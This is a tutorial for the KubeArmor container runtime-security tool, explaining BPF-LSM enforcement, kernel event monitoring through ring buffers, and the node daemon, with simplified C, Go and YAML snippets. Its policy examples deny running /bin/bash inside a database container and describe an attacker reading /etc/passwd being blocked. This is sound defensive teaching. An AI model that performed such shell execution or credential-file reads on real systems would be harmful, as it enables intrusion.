  • How it works: BPF programs are attached to Linux Security Module (LSM) hooks. These hooks are specifically designed points in the kernel where security decisions are made (e.g., before a file is opened, before a program is executed, before a capability is used).

  • Policy Rules in BPF Maps: KubeArmor translates its Security Policies into a format optimized for quick lookup and stores these rules in BPF Maps. There might be nested maps where an outer map is keyed by Namespace IDs (Container/Node Identity) and inner maps store rules specific to paths, processes, etc., for that workload.

  • Decision Making: When an event triggers a BPF-LSM hook, the attached eBPF program runs. It uses the current process's Namespace IDs to look up the relevant policy rules in the BPF maps. Based on the rule found (or the default posture if no specific rule matches), the BPF program returns a value to the kernel indicating whether the action should be allowed (0) or blocked (-EPERM, which is kernel speak for "Permission denied").

  • Event Reporting: Even when an action is blocked, the BPF-LSM program (or a separate monitoring BPF program) will often still send an event to the ring buffer so KubeArmor can log the blocked attempt.

The BPF-LSM enforcement flow has two phases: a pre-configuration step (KubeArmor loading the programs and rules) and then a fast, kernel-internal decision path when an event occurs.

Let's revisit a simplified BPF C code concept for enforcement (part of enforcer.bpf.c):

// Simplified BPF C code for enforcement (part of enforcer.bpf.c)

// Outer map: PidNS+MntNS -> reference to inner map (simplified to u32 for demo)
struct outer_key {
  u32 pid_ns;
  u32 mnt_ns;
};
struct {
  __uint(type, BPF_MAP_TYPE_HASH_OF_MAPS); // Or HASH, simplified
  __uint(max_entries, 256);
  __type(key, struct outer_key);
  __type(value, u32); // In reality, this points to an inner map
  __uint(pinning, LIBBPF_PIN_BY_NAME);
} kubearmor_containers SEC(".maps"); // Matches map name in Go code

// Inner map (concept): Path -> Rule
struct data_t {
  u8 processmask; // Flags like RULE_EXEC, RULE_DENY
};
// Inner maps are created/managed by KubeArmor in user space

SEC("lsm/bprm_check_security") // Attach to LSM hook for program execution
int BPF_PROG(enforce_proc, struct linux_binprm *bprm, int ret) {
  struct task_struct *t = (struct task_struct *)bpf_get_current_task();
  struct outer_key okey;
  get_outer_key(&okey, t); // Helper to get PidNS+MntNS

  // Look up the container's rules map using Namespace IDs
  u32 *inner_map_fd = bpf_map_lookup_elem(&kubearmor_containers, &okey);

  if (!inner_map_fd) {
    return ret; // No rules for this container, allow by default
  }

  // Get the program's path (simplified)
  struct path f_path = BPF_CORE_READ(bprm->file, f_path);
  char path[256];
  // Simplified path reading logic...
  bpf_probe_read_str(path, sizeof(path), /* path pointer */);

  // Look up the rule for this path in the inner map (conceptually)
  // struct data_t *rule = bpf_map_lookup_elem(inner_map_fd, &path); // Conceptually

  struct data_t *rule = /* Simplified: simulate lookup */ NULL; // Replace with actual map lookup

  // Decision logic based on rule and event type (BPF_CORE_READ bprm->file access mode)
  if (rule && (rule->processmask & RULE_EXEC)) {
      if (rule->processmask & RULE_DENY) {
          // Match found and action is DENY, block the execution
          // Report event (simplified out)
          return -EPERM; // Block
      }
      // Match found and action is ALLOW (or AUDIT), allow execution
      // Report event (if AUDIT) (simplified out)
      return ret; // Allow
  }

  // No specific DENY rule matched. Check default posture (simplified)
  u32 default_posture = /* Look up default posture in another map */ 0; // 0 for Allow

  if (default_posture == BLOCK_POSTURE) {
      // Default is BLOCK, block the execution
      // Report event (simplified out)
      return -EPERM; // Block
  }

  return ret; // Default is ALLOW or no default, allow
}

Explanation:

  • struct outer_key: Defines the key structure for the outer map (kubearmor_containers), using pid_ns and mnt_ns from the process's identity.

  • kubearmor_containers: A BPF map storing references to other maps (or rule data directly in simpler cases), allowing rules to be organized per container/namespace.

  • SEC("lsm/bprm_check_security"): Attaches this program to the LSM hook that is called before a new program is executed.

  • BPF_PROG(...): Macro defining the BPF program function.

  • get_outer_key: Helper function to get the Namespace IDs for the current task.

  • bpf_map_lookup_elem(&kubearmor_containers, &okey): Looks up the map (or data) associated with the current process's namespace IDs.

  • The core logic involves reading event data (like the program path), looking up the corresponding rule in the BPF maps, and returning 0 to allow or -EPERM to block, based on the rule's action flag (RULE_DENY).

  • Events are also reported to the ring buffer (kubearmor_events) for logging, similar to the monitoring path.

On the Go side, the BPF-LSM Runtime Enforcer component loads these programs and, crucially, populates the BPF Maps with the translated policies.

// Simplified Go code for loading BPF enforcement objects and populating maps (part of bpflsm/enforcer.go)

type BPFEnforcer struct {
    // ... other fields ...
    objs enforcerObjects // Holds loaded BPF programs and maps
    // ... other fields ...
}

// NewBPFEnforcer Function (simplified)
func NewBPFEnforcer(...) (*BPFEnforcer, error) {
    be := &BPFEnforcer{}

    // Load the compiled BPF code (.o file) containing programs and map definitions
    objs := enforcerObjects{} // enforcerObjects corresponds to maps and programs in the BPF .o file
    if err := loadEnforcerObjects(&objs, nil); err != nil {
        return nil, fmt.Errorf("failed to load BPF objects: %w", err)
    }
    be.objs = objs // Store loaded objects

    // Attach programs to LSM hooks
    // The AttachLSM call links the BPF program to the kernel hook
    // be.objs.EnforceProc refers to the BPF program defined with SEC("lsm/bprm_check_security")
	lsmLink, err := link.AttachLSM(link.LSMOptions{Program: objs.EnforceProc})
	if err != nil {
		objs.Close()
		return nil, fmt.Errorf("failed to attach BPF program to LSM hook: %w", err)
	}
	_ = lsmLink // be.links = append(be.links, lsmLink) // Store link to close it later (simplified)

    // Get references to the BPF maps defined in the C code
    // "kubearmor_containers" matches the map name in the BPF C code
    be.BPFContainerMap = objs.KubearmorContainers

    // ... Attach other programs (file, network, capabilities) ...
    // ... Setup ring buffer for alerts (like in monitoring) ...

    return be, nil
}

// AddContainerPolicies Function (simplified - conceptual)
func (be *BPFEnforcer) AddContainerPolicies(containerID string, pidns, mntns uint32, policies []tp.SecurityPolicy) error {
    // Translate KubeArmor policies (tp.SecurityPolicy) into a format
    // suitable for BPF map lookup (e.g., map of paths -> rule flags)
    // translatedRules := translatePoliciesToBPFRules(policies)

    // Create or get a reference to an inner map for this container (using BPF_MAP_TYPE_HASH_OF_MAPS)
    // The key for the outer map is the container's Namespace IDs
    outerKey := struct{ PidNS, MntNS uint32 }{pidns, mntns}

    // Conceptually:
    // innerMap, err := bpf.CreateMap(...) // Create inner map if it doesn't exist
    // err = be.BPFContainerMap.Update(outerKey, uint32(innerMap.FD()), ebpf.UpdateAny) // Link outer key to inner map FD

    // Populate the inner map with the translated rules
    // for path, ruleFlags := range translatedRules {
    //     ruleData := struct{ ProcessMask, FileMask uint8 }{...} // Map ruleFlags to data_t
    //     err = innerMap.Update(path, ruleData, ebpf.UpdateAny)
    // }

    // Simplified Update (directly indicating container exists with rules)
    containerMapValue := uint32(1) // Placeholder value
    if err := be.BPFContainerMap.Update(outerKey, containerMapValue, ebpf.UpdateAny); err != nil {
         return fmt.Errorf("failed to update BPF container map: %w", err)
    }


    be.Logger.Printf("Loaded BPF-LSM policies for container %s (pidns:%d, mntns:%d)", containerID, pidns, mntns)
    return nil
}

Explanation:

  • loadEnforcerObjects: Loads the compiled BPF enforcement code.

  • link.AttachLSM: Attaches a specific BPF program (objs.EnforceProc) to a named kernel LSM hook (lsm/bprm_check_security).

  • be.BPFContainerMap = objs.KubearmorContainers: Gets a handle (reference) to the BPF map defined in the C code. This handle allows the Go program to interact with the map in the kernel.

  • AddContainerPolicies: This conceptual function shows how KubeArmor translates high-level policies into a kernel-friendly format (e.g., flags like RULE_DENY, RULE_EXEC) and uses BPFContainerMap.Update to populate the maps. The Namespace IDs (pidns, mntns) are used as keys to ensure policies are applied to the correct container context.

This illustrates how KubeArmor uses user-space code to set up the BPF environment in the kernel, loading programs and populating maps. Once this is done, the BPF programs handle enforcement decisions directly within the kernel when events occur.
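
To make the namespace-ID keys concrete: on Linux, a namespace is identified by the inode number of its /proc/<pid>/ns/* entry. The standalone sketch below reads those IDs for the current process; it's an illustrative helper, not KubeArmor's actual lookup logic:

package main

import (
	"fmt"
	"os"
	"syscall"
)

// nsID returns the inode number of /proc/<pid>/ns/<nsType>, which is
// how Linux identifies a namespace.
func nsID(pid int, nsType string) (uint32, error) {
	fi, err := os.Stat(fmt.Sprintf("/proc/%d/ns/%s", pid, nsType))
	if err != nil {
		return 0, err
	}
	st, ok := fi.Sys().(*syscall.Stat_t)
	if !ok {
		return 0, fmt.Errorf("unexpected stat type %T", fi.Sys())
	}
	return uint32(st.Ino), nil
}

func main() {
	pid := os.Getpid()
	pidNS, _ := nsID(pid, "pid")
	mntNS, _ := nsID(pid, "mnt")
	// Together these two values form the outer-map key (struct outer_key above).
	fmt.Printf("pidns=%d mntns=%d\n", pidNS, mntNS)
}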

BPF Components Overview

BPF technology involves several key components:

  • BPF Programs: small, safe programs written in a C-like language and compiled to BPF bytecode. They run in the kernel; KubeArmor uses them to monitor events and enforce policies at hooks.

  • BPF Hooks: specific points in the kernel where BPF programs can be attached. KubeArmor attaches at syscall entry/exit, tracepoints, and LSM hooks.

  • BPF Maps: efficient key-value data structures that live in the kernel but are accessible from both kernel BPF and user space. KubeArmor uses them to store policy rules, event data (the ring buffer), and identity info.

  • BPF Verifier: the kernel component that checks BPF programs for safety before loading, ensuring KubeArmor's BPF programs cannot crash or compromise the kernel.

  • BPF JIT: compiles BPF bytecode to native machine code, making KubeArmor's BPF operations fast.

  • BPF Loader: the user-space library/tool that loads compiled programs and maps into the kernel. The KubeArmor Daemon uses the cilium/ebpf library as its loader.

Conclusion

In this chapter, you've taken a deeper dive into BPF (eBPF), the powerful kernel technology that forms the backbone of KubeArmor's runtime security capabilities. You learned how eBPF enables KubeArmor to run small, safe, high-performance programs inside the kernel for both observing system events (System Monitor) and actively enforcing security policies at low level hooks (Runtime Enforcer via BPF-LSM). You saw how BPF Maps are used to share data and store policy rules efficiently in the kernel.

Understanding BPF highlights KubeArmor's modern, efficient approach to container and node security. In the next chapter, we'll bring together all the components we've discussed by looking at the central orchestrator on each node: the KubeArmor Daemon.

System Monitor

Welcome back to the KubeArmor tutorial! In the previous chapters, we've built up our understanding of how KubeArmor defines security rules using Security Policies, how it figures out who is performing actions using Container/Node Identity, and how it configures the underlying OS to actively enforce those rules using the Runtime Enforcer.

But even with policies and enforcement set up, KubeArmor needs to constantly know what's happening inside your system. When a process starts, a file is accessed, or a network connection is attempted, KubeArmor needs to be aware of these events to either enforce a policy (via the Runtime Enforcer) or simply record the activity for auditing and visibility.

This is where the System Monitor comes in.

What is the System Monitor?

Think of the System Monitor as KubeArmor's eyes and ears inside the operating system on each node. While the Runtime Enforcer acts as the security guard making decisions based on loaded rules, the System Monitor is the surveillance system and log recorder that detects all the relevant activity.

Its main job is to:

  1. Observe: Watch for specific actions happening deep within the Linux kernel, like:

    • Processes starting or ending.

    • Files being opened, read, or written.

    • Network connections being made or accepted.

    • Changes to system privileges (capabilities).

  2. Collect Data: Gather detailed information about these events (which process, what file path, what network address, etc.).

  3. Add Context: Crucially, it correlates the low-level event data with the higher-level Container/Node Identity information KubeArmor maintains (like which container, pod, or node the event originated from).

  4. Prepare for Logging and Processing: Format this enriched event data so it can be sent for logging (via the Log Feeder) or used by other KubeArmor components.

The System Monitor uses advanced kernel technology, primarily eBPF, to achieve this low-overhead, deep visibility into system activities without requiring modifications to the applications or the kernel itself.

Why is Monitoring Important? A Use Case Example

Let's revisit our web server example. We have a policy to Block the web server container (app: my-web-app) from reading /etc/passwd.

  1. You apply the Security Policy.

  2. KubeArmor's Runtime Enforcer translates this policy and loads a rule into the kernel's security module (say, BPF-LSM).

  3. An attacker compromises your web server and tries to read /etc/passwd.

  4. The OS kernel intercepts this attempt (via the BPF-LSM hook configured by the Runtime Enforcer).

  5. Based on the loaded rule, the Runtime Enforcer's BPF program blocks the action.

So, the enforcement worked! The read was prevented. But how do you know this happened? How do you know someone tried to access /etc/passwd?

This is where the System Monitor is essential. Even when an action is blocked by the Runtime Enforcer, the System Monitor is still observing that activity.

When the web server attempts to read /etc/passwd:

  • The System Monitor's eBPF programs, also attached to kernel hooks, detect the file access attempt.

  • It collects data: the process ID, the file path (/etc/passwd), the type of access (read).

  • It adds context: it uses the process ID and Namespace IDs to look up in KubeArmor's internal map and identifies that this process belongs to the container with label app: my-web-app.

  • It also sees that the Runtime Enforcer returned an error code indicating the action was blocked.

  • The System Monitor bundles all this information (who, what, where, when, and the outcome - Blocked) and sends it to KubeArmor for logging.

Without the System Monitor, you would just have a failed system call ("Permission denied") from the application's perspective, but you wouldn't have the centralized, context-rich security alert generated by KubeArmor that tells you which container specifically tried to read /etc/passwd and that it was blocked by policy.

The System Monitor provides the crucial visibility layer, even for actions that are successfully prevented by enforcement. It also provides visibility for actions that are simply Audited by policy, or even for actions that are Allowed but that you want to monitor.

How the System Monitor Works (Under the Hood)

The System Monitor relies heavily on eBPF programs loaded into the Linux kernel. Here's a simplified flow:

  1. Initialization: When the KubeArmor Daemon starts on a node, its System Monitor component loads various eBPF programs into the kernel.

  2. Hooking: These eBPF programs attach to specific points (called "hooks") within the kernel where system events occur (e.g., just before a file open is processed, or when a new process is created).

  3. Event Detection: When a user application or system process performs an action (like open("/etc/passwd")), the kernel reaches the attached eBPF hook.

  4. Data Collection (in Kernel): The eBPF program at the hook executes. It can access information about the event directly from the kernel's memory (like the process structure, file path, network socket details). It also gets the process's Namespace IDs Container/Node Identity.

  5. Event Reporting (Kernel to User Space): The eBPF program packages the collected data (raw event + Namespace IDs) into a structure and sends it to the KubeArmor Daemon in user space using a highly efficient kernel mechanism, typically an eBPF ring buffer.

  6. Data Reception (in KubeArmor Daemon): The System Monitor component in the KubeArmor Daemon continuously reads from this ring buffer.

  7. Context Enrichment: For each incoming event, the System Monitor uses the Namespace IDs provided by the eBPF program to look up the corresponding Container ID, Pod Name, Namespace, and Labels in its internal identity map (the one built by the Container/Node Identity component). It also adds other relevant details like the process's current working directory and parent process.

  8. Log/Alert Generation: The System Monitor formats all this enriched information into a structured log or alert message.

  9. Forwarding: The formatted log is then sent to the Log Feeder component, which is responsible for sending it to your configured logging or alerting systems.

In short, the eBPF programs in the kernel are the first point of contact for system events, collecting the initial data before sending it up to the KubeArmor Daemon for further processing, context addition, and logging.

Looking at the Code (Simplified)

Let's look at tiny snippets from the KubeArmor source code to see hints of how this works.

The eBPF programs (written in C, compiled to BPF bytecode) define the structure of the event data they send to user space. In KubeArmor/BPF/shared.h, you can find structures like event:

// KubeArmor/BPF/shared.h (Simplified)

typedef struct {
  u64 ts; // Timestamp

  u32 pid_id; // PID Namespace ID
  u32 mnt_id; // Mount Namespace ID

  // ... other process IDs (host/container) and UID ...

  u32 event_id; // Identifier for the type of event (e.g., file open, process exec)
  s64 retval;   // Return value of the syscall (useful for blocked actions)

  u8 comm[TASK_COMM_LEN]; // Process command name

  bufs_k data; // Structure potentially holding file path, source process path

  u64 exec_id; // Identifier for exec events
} event;

struct {
  __uint(type, BPF_MAP_TYPE_RINGBUF); // The type of map used for kernel-to-userspace communication
  __uint(max_entries, 1 << 24);
  __uint(pinning, LIBBPF_PIN_BY_NAME);
} kubearmor_events SEC(".maps"); // This is the ring buffer map

This shows the event structure containing key fields like timestamps, Namespace IDs (pid_id, mnt_id), the type of event (event_id), the syscall result (retval), the command name, and potentially file paths (data). It also defines the kubearmor_events map as a BPF_MAP_TYPE_RINGBUF, which is the mechanism used by eBPF programs in the kernel to efficiently send these event structures to the KubeArmor Daemon in user space.

On the KubeArmor Daemon side (in Go), the System Monitor component (KubeArmor/monitor/systemMonitor.go) reads from this ring buffer and processes the events.

// KubeArmor/monitor/systemMonitor.go (Simplified)

// SystemMonitor Structure (partially shown)
type SystemMonitor struct {
    // ... other fields ...

    // system events
    SyscallChannel chan []byte // Channel to receive raw event data
    SyscallPerfMap *perf.Reader // Reads from the eBPF ring buffer

    // PidID + MntID -> container id map (from Container/Node Identity)
    NsMap map[NsKey]string
    NsMapLock *sync.RWMutex

    // context + args
    ContextChan chan ContextCombined // Channel to send processed events

	// ... other fields ...
}

// TraceSyscall Function (Simplified)
func (mon *SystemMonitor) TraceSyscall() {
	if mon.SyscallPerfMap != nil {
		// Goroutine to read from the perf buffer (ring buffer)
		go func() {
			for {
				record, err := mon.SyscallPerfMap.Read() // Read raw event data from the ring buffer
				if err != nil {
                    // ... error handling ...
					return
				}
				// Send raw data to the processing channel
				mon.SyscallChannel <- record.RawSample
			}
		}()
	} else {
        // ... log error ...
		return
	}

    // Goroutine to process events from the channel
	for {
		select {
		case <-StopChan:
			return // Exit when told to stop

		case dataRaw, valid := <-mon.SyscallChannel: // Receive raw event data
			if !valid {
				continue
			}

			// Read the raw data into the SyscallContext struct
			dataBuff := bytes.NewBuffer(dataRaw)
			ctx, err := readContextFromBuff(dataBuff) // Helper to parse raw bytes
			if err != nil {
                // ... handle parse error ...
				continue
			}

            // Get argument data (file path, network address, etc.)
			args, err := GetArgs(dataBuff, ctx.Argnum) // Helper to parse arguments
			if err != nil {
                // ... handle args error ...
				continue
			}

			containerID := ""
			if ctx.PidID != 0 && ctx.MntID != 0 {
                // Use Namespace IDs from the event to look up Container ID in NsMap
				containerID = mon.LookupContainerID(ctx.PidID, ctx.MntID) // This uses the map from Chapter 2 context
			}

            // If lookup failed and it's a container NS, maybe replay (simplified out)
            // If it's host (PidID/MntID 0) or lookup succeeded...

            // Push the combined context (with ContainerID) to another channel for logging/policy processing
			mon.ContextChan <- ContextCombined{ContainerID: containerID, ContextSys: ctx, ContextArgs: args}
		}
	}
}

// LookupContainerID Function (from monitor/processTree.go - shown in Chapter 2 context)
func (mon *SystemMonitor) LookupContainerID(pidns, mntns uint32) string {
    // ... implementation using NsMap map ...
    // This is where the correlation happens: Namespace IDs -> Container ID
}

// ContextCombined Structure (from monitor/systemMonitor.go)
type ContextCombined struct {
	ContainerID string // Added context from lookup
	ContextSys  SyscallContext // Raw data from eBPF
	ContextArgs []interface{} // Parsed arguments from raw data
}

This Go code shows:

  1. The SyscallPerfMap reading from the eBPF ring buffer in the kernel.

  2. Raw event data being sent to the SyscallChannel.

  3. A loop reading from SyscallChannel, parsing the raw bytes into a SyscallContext struct.

  4. Using ctx.PidID and ctx.MntID (Namespace IDs) to call LookupContainerID and get the containerID.

  5. Packaging the raw context (ContextSys), parsed arguments (ContextArgs), and the looked-up ContainerID into a ContextCombined struct.

  6. Sending the enriched ContextCombined event to the ContextChan.

This ContextCombined structure is the output of the System Monitor – it's the rich event data with identity context ready for the Log Feeder and other components.
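
The identity lookup itself is conceptually just a map read keyed by the two namespace IDs. Here's a minimal, self-contained sketch of that idea, with hypothetical namespace IDs and container IDs for illustration:

package main

import (
	"fmt"
	"sync"
)

// NsKey pairs the two namespace IDs that identify a workload.
type NsKey struct {
	PidNS uint32
	MntNS uint32
}

// nsMap mimics the SystemMonitor's NsMap: namespace IDs -> container ID.
var (
	nsMap     = map[NsKey]string{}
	nsMapLock sync.RWMutex
)

// lookupContainerID returns the container ID for a pair of namespace
// IDs, or "" for host processes or containers not yet registered.
func lookupContainerID(pidns, mntns uint32) string {
	nsMapLock.RLock()
	defer nsMapLock.RUnlock()
	return nsMap[NsKey{PidNS: pidns, MntNS: mntns}]
}

func main() {
	// Hypothetical namespace IDs and container ID, for illustration.
	nsMap[NsKey{PidNS: 4026531836, MntNS: 4026531840}] = "db-container-1234"

	fmt.Println(lookupContainerID(4026531836, 4026531840)) // db-container-1234
	fmt.Println(lookupContainerID(1, 2) == "")             // true: unknown namespaces
}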

Types of Events Monitored

The System Monitor uses different eBPF programs attached to various kernel hooks to monitor different types of activities:

  • Process: process execution (execve, execveat), process exit (do_exit), privilege changes (setuid, setgid). Primary mechanisms: tracepoints, kprobes, BPF-LSM.

  • File: file open (open, openat), delete (unlink, unlinkat, rmdir), ownership changes (chown, fchownat). Primary mechanisms: kprobes, tracepoints, BPF-LSM.

  • Network: socket creation (socket), connection attempts (connect), accepting connections (accept), binding addresses (bind), listening on sockets (listen). Primary mechanisms: kprobes, tracepoints, BPF-LSM.

  • Capability: use of privileged kernel features (capabilities). Primary mechanisms: BPF-LSM, kprobes.

  • Syscall: general system call entry/exit for various calls. Primary mechanisms: kprobes, tracepoints.

The specific hooks used might vary slightly depending on the kernel version and the chosen Runtime Enforcer configuration (AppArmor/SELinux use different integration points than pure BPF-LSM), but the goal is the same: intercept and report relevant system calls and kernel security hooks.

System Monitor and Other Components

The System Monitor acts as a fundamental data source:

  • It provides the event data that the Runtime Enforcer's BPF programs might check against loaded policies in the kernel (BPF-LSM case). Note that enforcement happens at the hook via the rules loaded by the Enforcer, but the Monitor still observes the event and its outcome.

  • It uses the mappings maintained by the Container/Node Identity component to add context to raw events.

  • It prepares and forwards structured event logs to the Log Feeder.

Essentially, the Monitor is the "observer" part of KubeArmor's runtime security. It sees everything, correlates it to your workloads, and reports it, enabling both enforcement (via the Enforcer's rules acting on these observed events) and visibility.

Conclusion

In this chapter, you learned that the KubeArmor System Monitor is the component responsible for observing system events happening within the kernel. Using eBPF technology, it detects file access, process execution, network activity, and other critical operations. It enriches this raw data with Container/Node Identity context and prepares it for logging and analysis, providing essential visibility into your system's runtime behavior, regardless of whether an action was allowed, audited, or blocked by policy.

Understanding the System Monitor and its reliance on eBPF is key to appreciating KubeArmor's low-overhead, high-fidelity approach to runtime security. In the next chapter, we'll take a deeper dive into the technology that powers this monitoring (and the BPF-LSM enforcer): BPF (eBPF).

KubeArmor Daemon

Welcome back to the KubeArmor tutorial! In our journey so far, we've explored the key components that make KubeArmor work:

  • Security Policies: Your rulebooks for security.

  • Container/Node Identity: How KubeArmor knows who is doing something.

  • Runtime Enforcer: The component that translates policies into kernel rules and blocks forbidden actions.

  • System Monitor: KubeArmor's eyes and ears, observing system events.

  • BPF (eBPF): The powerful kernel technology powering much of the monitoring and enforcement.

In this chapter, we'll look at the KubeArmor Daemon. If the other components are like specialized tools or senses, the KubeArmor Daemon is the central brain and orchestrator that lives on each node. It brings all these pieces together, allowing KubeArmor to function as a unified security system.

What is the KubeArmor Daemon?

The KubeArmor Daemon is the main program that runs on every node (Linux server) where you want KubeArmor to provide security. When you install KubeArmor, you typically deploy it as a DaemonSet in Kubernetes, ensuring one KubeArmor Daemon pod runs on each of your worker nodes. If you're using KubeArmor outside of Kubernetes (on a standalone Linux server or VM), the daemon runs directly as a system service.

Think of the KubeArmor Daemon as the manager for that specific node. Its responsibilities include:

  • Starting and stopping all the other KubeArmor components (System Monitor, Runtime Enforcer, Log Feeder).

  • Communicating with external systems like the Kubernetes API server or the container runtime (Docker, containerd, CRI-O) to get information about running workloads and policies.

  • Building and maintaining the internal mapping for Container/Node Identity.

  • Fetching and processing Security Policies (KSP, HSP, CSP) that apply to the workloads on its node.

  • Instructing the Runtime Enforcer on which policies to load and enforce for specific containers and the host.

  • Receiving security events and raw data from the System Monitor.

  • Adding context (like identity) to raw events received from the monitor.

  • Forwarding processed logs and alerts to the Log Feeder for external consumption.

  • Handling configuration changes and responding to shutdown signals.

Without the Daemon, the individual components couldn't work together effectively to provide end-to-end security.

Why is the Daemon Needed? A Coordinated Use Case

Let's trace the journey of a security policy and a system event, highlighting the Daemon's role.

Imagine you want to protect a specific container, say a database pod with label app: my-database, by blocking it from executing the /bin/bash command. You create a KubeArmor Policy (KSP) like this:

# Simplified KSP
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: block-bash-in-db
  namespace: default
spec:
  selector:
    matchLabels:
      app: my-database
  process:
    matchPaths:
      - path: /bin/bash
  action: Block

And let's say later, a process inside that database container actually attempts to run /bin/bash.

Here's how the KubeArmor Daemon on the node hosting that database pod orchestrates the process:

  1. Policy Discovery: The KubeArmor Daemon, which is watching the Kubernetes API server, detects your new block-bash-in-db policy.

  2. Identify Targets: The Daemon processes the policy's selector (app: my-database). It checks its internal state (built by talking to the Kubernetes API and container runtime) to find which running containers/pods on its node match this label. It identifies the specific database container.

  3. Prepare Enforcement: The Daemon takes the policy rule (Block /bin/bash) and tells its Runtime Enforcer component to load this rule specifically for the identified database container. The Enforcer translates this into the format needed by the underlying OS security module (AppArmor, SELinux, or BPF-LSM) and loads it into the kernel.

  4. System Event: A process inside the database container tries to execute /bin/bash.

  5. Event Detection & Enforcement: The OS kernel intercepts this action. If using BPF-LSM, the Runtime Enforcer's BPF program checks the loaded policy rules (which the Daemon put there). It sees the rule to Block /bin/bash for this container's identity. The action is immediately blocked by the kernel.

  6. Event Monitoring & Context: Simultaneously, the System Monitor's BPF programs also detect the exec attempt on /bin/bash. It collects details like the process ID, the attempted command, and the process's Namespace IDs. It sends this raw data to the Daemon (via a BPF ring buffer).

  7. Event Processing: The Daemon receives the raw event from the Monitor. It uses the Namespace IDs to look up the Container/Node Identity in its internal map, identifying that this event came from the database container (app: my-database). It sees the event includes an error code indicating it was blocked by the security module.

  8. Log Generation: The Daemon formats a detailed log/alert message containing all the information: the event type (process execution), the command (/bin/bash), the outcome (Blocked), and the workload identity (container ID, Pod Name, Namespace, Labels).

  9. Log Forwarding: The Daemon sends this formatted log message to its Log Feeder component, which then forwards it to your configured logging/monitoring system.

This sequence illustrates how the Daemon acts as the central point, integrating information flow and control between external systems (K8s, CRI), the low-level kernel components (Monitor, Enforcer), and the logging/alerting system.

The Daemon Structure

Let's look at the core structure representing the KubeArmor Daemon in the code. It holds references to all the components it manages and the data it needs.

Referencing KubeArmor/core/kubeArmor.go:

// KubeArmorDaemon Structure (Simplified)
type KubeArmorDaemon struct {
	// node information
	Node     tp.Node
	NodeLock *sync.RWMutex

	// flag
	K8sEnabled bool

	// K8s pods, containers, endpoints, owner info
	// These map identity details collected from K8s/CRI
	K8sPods     []tp.K8sPod
	K8sPodsLock *sync.RWMutex
	Containers     map[string]tp.Container
	ContainersLock *sync.RWMutex
	EndPoints     []tp.EndPoint
	EndPointsLock *sync.RWMutex
	OwnerInfo map[string]tp.PodOwner

	// Security policies watched from K8s API
	SecurityPolicies     []tp.SecurityPolicy
	SecurityPoliciesLock *sync.RWMutex
	HostSecurityPolicies     []tp.HostSecurityPolicy
	HostSecurityPoliciesLock *sync.RWMutex

	// logger component
	Logger *fd.Feeder

	// system monitor component
	SystemMonitor *mon.SystemMonitor

	// runtime enforcer component
	RuntimeEnforcer *efc.RuntimeEnforcer

	// Used for managing background goroutines
	WgDaemon sync.WaitGroup

	// ... other fields for health checks, state agent, etc. ...
}

Explanation:

  • The KubeArmorDaemon struct contains fields like Node (details about the node it runs on), K8sEnabled (whether it's in a K8s cluster), and maps/slices to store information about K8sPods, Containers, EndPoints, and parsed SecurityPolicies. Locks (*sync.RWMutex) are used to safely access this shared data from multiple parts of the Daemon's logic.

  • Crucially, it has pointers to the other main components: Logger, SystemMonitor, and RuntimeEnforcer. This shows that the Daemon owns and interacts with instances of these components.

  • WgDaemon is a sync.WaitGroup used to track background processes (goroutines) started by the Daemon, allowing for a clean shutdown.

Daemon Lifecycle: Initialization and Management

When KubeArmor starts on a node, the KubeArmor() function in KubeArmor/main.go (which calls into KubeArmor/core/kubeArmor.go) initializes and runs the Daemon.

Here's a simplified look at the initialization steps within the KubeArmor() function:

// KubeArmor Function (Simplified)
func KubeArmor() {
	// create a daemon instance
	dm := NewKubeArmorDaemon()
	// dm is our KubeArmorDaemon object on this node

	// ... Node info setup (whether in K8s or standalone) ...

	// initialize log feeder component
	if !dm.InitLogger() {
		// handle error and destroy daemon
		return
	}
	dm.Logger.Print("Initialized KubeArmor Logger")

	// Start logger's background process to serve feeds
	go dm.ServeLogFeeds()

	// ... StateAgent, Health Server initialization ...

	// initialize system monitor component
	if cfg.GlobalCfg.Policy || cfg.GlobalCfg.HostPolicy { // Only if policy/hostpolicy is enabled
		if !dm.InitSystemMonitor() {
			// handle error and destroy daemon
			return
		}
		dm.Logger.Print("Initialized KubeArmor Monitor")

		// Start system monitor's background processes to trace events
		go dm.MonitorSystemEvents()

		// initialize runtime enforcer component
		// It receives the SystemMonitor instance because the BPF enforcer
		// might need info from the monitor (like pin paths)
		if !dm.InitRuntimeEnforcer(dm.SystemMonitor.PinPath) {
			dm.Logger.Print("Disabled KubeArmor Enforcer since No LSM is enabled")
		} else {
			dm.Logger.Print("Initialized KubeArmor Enforcer")
		}

		// ... Presets initialization ...
	}

	// ... K8s/CRI specific watching for Pods/Containers/Policies ...

	// wait for a while (initialization sync)

	// ... Policy and Pod watching (K8s specific) ...

	// listen for interrupt signals to trigger shutdown
	sigChan := GetOSSigChannel()
	<-sigChan // This line blocks until a signal is received

	// destroy the daemon (calls Close methods on components)
	dm.DestroyKubeArmorDaemon()
}

// NewKubeArmorDaemon Function (Simplified)
func NewKubeArmorDaemon() *KubeArmorDaemon {
	dm := new(KubeArmorDaemon)
	// Initialize maps, slices, locks, and component pointers to nil/empty
	dm.NodeLock = new(sync.RWMutex)
	dm.K8sPodsLock = new(sync.RWMutex)
	dm.ContainersLock = new(sync.RWMutex)
	dm.EndPointsLock = new(sync.RWMutex)
	dm.SecurityPoliciesLock = new(sync.RWMutex)
	dm.HostSecurityPoliciesLock = new(sync.RWMutex)
	dm.DefaultPosturesLock = new(sync.Mutex)
	dm.ActivePidMapLock = new(sync.RWMutex)
	dm.MonitorLock = new(sync.RWMutex)

	dm.Containers = map[string]tp.Container{}
	dm.EndPoints = []tp.EndPoint{}
	dm.OwnerInfo = map[string]tp.PodOwner{}
	dm.DefaultPostures = map[string]tp.DefaultPosture{}
	dm.ActiveHostPidMap = map[string]tp.PidMap{}
	// Pointers to components (Logger, Monitor, Enforcer) are initially nil
	return dm
}

// InitSystemMonitor Function (Called by Daemon)
func (dm *KubeArmorDaemon) InitSystemMonitor() bool {
    // Create a new SystemMonitor instance, passing it data it needs
	dm.SystemMonitor = mon.NewSystemMonitor(
        &dm.Node, &dm.NodeLock, // Node info
        dm.Logger, // Reference to the logger
        &dm.Containers, &dm.ContainersLock, // Container identity info
        &dm.ActiveHostPidMap, &dm.ActivePidMapLock, // Host process identity info
        &dm.MonitorLock, // Monitor's own lock
    )
	if dm.SystemMonitor == nil {
		return false
	}

    // Initialize BPF inside the monitor
	if err := dm.SystemMonitor.InitBPF(); err != nil {
		return false
	}
	return true
}

